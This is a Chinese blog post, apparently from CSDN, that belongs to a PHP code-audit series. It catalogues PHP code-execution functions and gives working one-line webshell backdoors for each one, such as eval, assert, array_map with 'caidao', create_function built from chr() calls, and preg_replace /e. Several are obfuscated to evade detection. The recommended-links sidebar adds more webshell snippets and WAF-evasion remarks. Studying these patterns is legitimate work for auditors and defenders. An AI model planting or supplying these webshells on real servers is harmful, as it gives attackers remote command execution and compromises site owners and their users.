PHP代码审计之路——5.代码执行及一句话木马总结

最新推荐文章于 2024-04-17 06:30:00 发布
最新推荐文章于 2024-04-17 06:30:00 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: PHP代码 文章标签: php木马 php 一句话
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24196029/article/details/78118680
版权 
 
 
  • mixed eval ( string $code )
把字符串 code 作为PHP代码执行 

 
 
  • bool assert ( mixed $assertion [, string $description ] ) PHP 5
 
 
  • bool assert ( mixed $assertion [, Throwable $exception ] ) PHP 7
如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。 

 
 
  • array array_map ( callable $callback , array $array1 [, array $... ] )
 
 
  • array_map():返回数组,是为 array1 每个元素应用 callback函数之后的数组。 callback 函数形参的数量和传给 array_map() 数组数量,两者必须一样。

 
 
  • mixed call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] )
第一个参数 callback 是被调用的回调函数,其余参数是回调函数的参数 
 
 
  • mixed call_user_func_array ( callable $callback , array $param_arr )
把第一个参数作为回调函数(callback)调用,把参数数组作(param_arr)为回调函数的的参数传入 
 
 
  • string create_function ( string $args , string $code )
创建一个匿名函数 
 
 
  • mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
搜索subject中匹配pattern的部分, 以replacement进行替换
7.0.0 不再支持 /e修饰符。 请用 preg_replace_callback() 代替。
5.5.0 /e 修饰符已经被弃用了。使用 preg_replace_callback() 代替。

1. eval
2. assert
3.call_user_func
4. array_map
5. create_function
6.变量
7. preg_replace
1. eval 
<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>   #page
<?php $c = str_replace('b', '', '_bbPbbbbObSbbbbbTbbb');$a = $$c;eval($a['mima']);?>


2. assert 
assert($_POST[c]);
或者
assert('assert(eval($_POST[page]));');//必须single-queto
assert('eval($_POST[page]);');//必须single-queto


3.call_user_func、call_user_func_array 
call_user_func('assert', "phpinfo()");
call_user_func(base64_decode('YXNzZXJ0'), "phpinfo()");

call_user_func_array('assert',array('system(dir)'));


4. array_map 
<?php array_map("as\x73\x65rt",(array)$_REQUEST['caidao']);?>

<?php
strcasecmp(md5($_GET['qid']),'aaa1fb894b5716d60771e6f230b67e6c')?array_map("as\x73ert",(array)$_REQUEST['caidao']):next;
?>

abcleo



5. create_function 
<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

简单翻译
$_uU=chr;
$_cC=eval(_POST[1]);
$_fF=create_function;
$_=create_funtion("",$cC);
@$_();


6.变量 
@$_GET[a]($_GET[b]);


7. preg_replace 
preg_replace('/some/e',$_POST[c],'some');


如有兴趣深入,推荐文章
http://www.freebuf.com/articles/web/9396.html 那些强悍的PHP一句话后门

题外话,还有更好玩的,利用LFI及各种日志文件,如apahce acces日志来get shell,有空再写,别忘记了。
Leo_Heascle
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql写php木马_PHP一句话木马总结与SQL语句写一句话木马
weixin_35755823的博客
01-27 274
一、基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来:1 2 相信一目了然可以看懂如何使用这类一句话。二、编码的替换的类型:1 2 //会生成34 @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));5 //ph...
AG一句话木马总结
weixin_45486362的博客
06-25 498
asp一句话木马 <%eval request("AG")%> <%execute request("AG")%> <%execute(request("AG"))%> <%execute request("AG")%><%'<% loop <%:%> <%'<% loop <%:%><%execute request("AG")%> "%><%execute(request("
一句话木马总结
weixin_45116657的博客
10-25 395
<?php @eval($_POST['cmd']);?> <?php @assert($_POST[cmd]);?> https://www.jianshu.com/p/90473b8e6667
PHP一句话木马
Code-5的博客
04-17 1306
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
PHP执行命令一句话
weixin_34067049的博客
01-23 173
cmdexec20101201.php?cx=uname-a<pre><?$cx1=$_GET['cx'];echo`$cx1`;?><pre>register_global=on,可以用下面的简化版:<pre><?=`$cx`?></pre>cmdexec20101201.php...
一句话木马
qq_43814486的博客
04-22 2361
条件:1.有服务器的写入权限。2.知道服务器的地址。目的:将我们的一句话木马插入到服务器的asp文件中。 例如:在服务器的地址里创建一个叫virus.php文件里边放代码: <?php system($_GET['cmd'])?> 然后我们就可以通过URL去操控服务器的cmd了,例如访问: http://127.0.0.1/virus.php?cmd=ipconfig 相当于在服...
php一句话cmdshell新型 (非一句话木马)
10-30
虽然通常的一句话木马是直接执行 PHP 代码,但这个新型的 CMDShell 不同,它利用了 PHP 的一个特殊特性:反引号(``)来执行系统命令。 反引号在 PHP 中用于执行 shell 命令并捕获其输出。当 PHP 遇到反引号包裹的...
一句话木马要点和防范注意事项
最新发布
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
一句话 asp木马加密版 彻底突破杀毒软件
01-02
看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N=”)” Do While ...
PHP网站中的一句话木马安全性和防范措施的研究.pdf
01-05
PHP一句话木马是一种使用eval函数来执行恶意代码木马,通常的代码形式为`<?php @eval($_POST['pass']);?>`。其中,eval函数将字符串按照PHP代码来计算,@符号用于停止报错,而pass是木马连接器的访问密码,通过...
php一句话调用,PHP执行命令一句话
weixin_34460480的博客
03-10 106
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
全方面角度剖析一句话木马
一生无悔惜缘的博客
08-17 478
全方面角度剖析一句话木马 米斯特白帽子WEB安全攻防培训第二期 讲师:gh0stkey 概念区分 大马、小马、一句话? 大马: 一句话:     一句话木马的优势有哪些? 1.短小精悍 1.1隐蔽性强 1.2 运行方便 1.3 便携性强   一句话木马的缺陷有哪些? 可被爆破 常见的一句话木马有哪些? 文档:常用的一句话.txt(有需要的请留言,我私发给你)
小马的免杀
sweetie 的博客
04-12 828
一般的php一句话后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句话木马,要想绕过waf就需要对木马进行一些变形。(仅供分享经验,不可用作非法用途) 图片来源 一.先看一只有趣的小马 <?php ($b4dboy = $_POST['b4dboy']) &&@preg_replace('/ad/e','@'.str_rot13('riny')."($b4dboy)", 'add'); ?> 沙箱检测它是安全文件 用D盾查杀只是发现可以的str_rot1
谷歌chrome浏览器被毒霸上网导航www.uu114.cn劫持 chrome://version命令行被篡改
dducsnpbb77257296的博客
09-02 5762
问题描述 win10系统更新, 谷歌chrome浏览器打开后自动跳转到被劫持的网站。我的被hao123劫持, 瞬间对hao123的好感度下降浏览器输入chrome://version 可以看到“命令行:。。。”最后面被篡改 问题解决本人尝试了很多可以百度出来的方法,除了千篇一律,重点是没有比较便捷,没有完美解决我的问题 最终成功解决的方法: 第一步:桌面浏览...
一句话木马是如何被执行的?
weixin_40950781的博客
08-18 2897
一句话木马是如何被执行的0x01 什么是一句话0x02 最最典型的一句话小马0x03 大马与小马0x04 一句话小马是如何执行的呢 0x01 什么是一句话 一句话木马就是只需要一行代码木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。 0x02 最最典型的一句话小马 asp一句话:<%eval r...
CISP-PTE学习总结之基础练习题(二)
千寻的博客
10-20 7574
基础题目一:SQL注入 0x01 题目要求 0x02 解题过程 基础题目二:文件上传突破 0x01 题目要求 0x02 解题过程 基础题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目四:代码执行漏洞 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目五:失效的访问控制 0x01 题目要求 0x02 解题过程
一句话木马该怎么实现?现在就带你了解
kali_Ma的博客
07-30 5359
前言 一直以来,Java一句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句话木马:利用Java中JS引擎实现的一句话木马。 基本原理 Java没有eval函数,Js有eval函数,可以把字符串当代码解析。 Java从1.6开始自带ScriptEng
PHP一句话木马
热门推荐
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
一句话木马图片转换成php
01-28
一句话木马图片转换成php是指将一个包含恶意代码的图片文件(一句话木马)转换为可执行php代码。这种操作通常是为了绕过一些安全策略,将恶意代码注入到目标系统中,从而实施各种攻击,如窃取用户信息、篡改网页...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值